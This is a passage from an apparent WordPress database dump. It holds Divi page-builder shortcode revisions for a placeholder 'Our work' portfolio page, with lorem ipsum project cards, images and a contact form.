text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\" global_module=\"630\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Work','','inherit','closed','closed','','396-revision-v1','','','2020-08-07 21:00:50','2020-08-07 21:00:50','',396,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/396-revision-v1/',0,'revision','',0),(654,1,'2020-08-07 21:02:05','2020-08-07 21:02:05','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"|||\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>Our work</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off%22\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Projects Section\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"50px||50px||false|false\" hover_enabled=\"0\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 01\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]01\r[/et_pb_text][et_pb_cta title=\"ABC - Corporate Branding\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 02\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]02\r[/et_pb_text][et_pb_cta title=\"Enkuber - App Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 03\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]03\r[/et_pb_text][et_pb_cta title=\"Iqra - Business Development\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" header_font=\"Montserrat|700|||||||\" header_text_color=\"#353740\" header_line_height=\"1.5em\" body_font=\"Montserrat||||||||\" body_text_color=\"#747d88\" body_font_size=\"18px\" body_line_height=\"1.8em\" use_background_color=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|700||on|||||\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" text_orientation=\"left\" background_layout=\"light\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"6%\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum.\r[/et_pb_cta][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Project 04\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"50px|||\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"5%||5%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Number\" _builder_version=\"4.5.2\" text_font=\"Montserrat|on|||\" text_text_color=\"#d4b068\" text_font_size=\"80px\" text_line_height=\"1em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]04\r[/et_pb_text][et_pb_cta title=\"Ninza - Branding Identity\" button_url=\"#\" button_text=\"View Project\" _builder_version=\"3.16\" 